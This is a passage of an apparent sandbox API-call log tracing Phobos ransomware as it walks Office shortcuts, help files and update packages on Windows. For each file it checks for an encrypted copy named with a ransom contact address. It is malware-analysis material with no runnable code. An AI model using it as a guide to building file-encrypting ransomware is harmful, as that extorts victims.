"c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 language preferences.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.971] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 language preferences.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.972] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.972] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 upload center.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0122.972] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=2837) returned 1 [0122.972] CloseHandle (hObject=0x2b8) returned 1 [0122.972] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 upload center.lnk")) returned 0x20 [0122.972] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 upload center.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.972] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 upload center.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.972] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.972] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office picture manager.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0122.973] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=2875) returned 1 [0122.973] CloseHandle (hObject=0x2b8) returned 1 [0122.973] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office picture manager.lnk")) returned 0x20 [0122.973] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office picture manager.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0122.973] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office picture manager.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0122.973] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0122.973] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft project server 2010 accounts.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.289] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=2999) returned 1 [0123.289] CloseHandle (hObject=0x2b8) returned 1 [0123.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft project server 2010 accounts.lnk")) returned 0x20 [0123.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft project server 2010 accounts.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.289] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft project server 2010 accounts.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.289] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.289] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.305] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=338) returned 1 [0123.305] CloseHandle (hObject=0x2b8) returned 1 [0123.305] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn")) returned 0x2022 [0123.305] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.305] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.305] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.305] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.306] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=326) returned 1 [0123.306] CloseHandle (hObject=0x2b8) returned 1 [0123.306] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn")) returned 0x2022 [0123.306] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.306] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.306] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.306] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.307] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=350) returned 1 [0123.307] CloseHandle (hObject=0x2b8) returned 1 [0123.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn")) returned 0x2022 [0123.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.307] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.307] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.307] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.307] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=392) returned 1 [0123.307] CloseHandle (hObject=0x2b8) returned 1 [0123.308] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn")) returned 0x2022 [0123.308] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.308] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO.SHAPESHEET.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.shapesheet.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.308] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.308] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.309] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=350) returned 1 [0123.309] CloseHandle (hObject=0x2b8) returned 1 [0123.309] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn")) returned 0x2022 [0123.309] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.309] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_PRM.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_prm.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.310] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.310] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.310] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=350) returned 1 [0123.310] CloseHandle (hObject=0x2b8) returned 1 [0123.310] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn")) returned 0x2022 [0123.310] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.310] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.VISIO_STD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio_std.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.311] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.311] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.312] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=338) returned 1 [0123.312] CloseHandle (hObject=0x2b8) returned 1 [0123.312] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn")) returned 0x2022 [0123.312] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.312] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.312] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.312] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.314] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=362) returned 1 [0123.314] CloseHandle (hObject=0x2b8) returned 1 [0123.314] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn")) returned 0x2022 [0123.314] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.315] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.315] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.315] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.316] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=338) returned 1 [0123.316] CloseHandle (hObject=0x2b8) returned 1 [0123.316] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn")) returned 0x2022 [0123.316] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.316] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.317] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.317] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.318] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=362) returned 1 [0123.318] CloseHandle (hObject=0x2b8) returned 1 [0123.318] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn")) returned 0x2022 [0123.318] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.318] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winword.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.318] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.318] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.319] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=8668) returned 1 [0123.319] CloseHandle (hObject=0x2b8) returned 1 [0123.320] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl")) returned 0x2022 [0123.320] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.320] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.320] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.320] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b8 [0123.325] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=1012025) returned 1 [0123.325] CloseHandle (hObject=0x2b8) returned 1 [0123.325] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu")) returned 0x20 [0123.325] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.325] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.325] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.326] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.372] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=1034556) returned 1 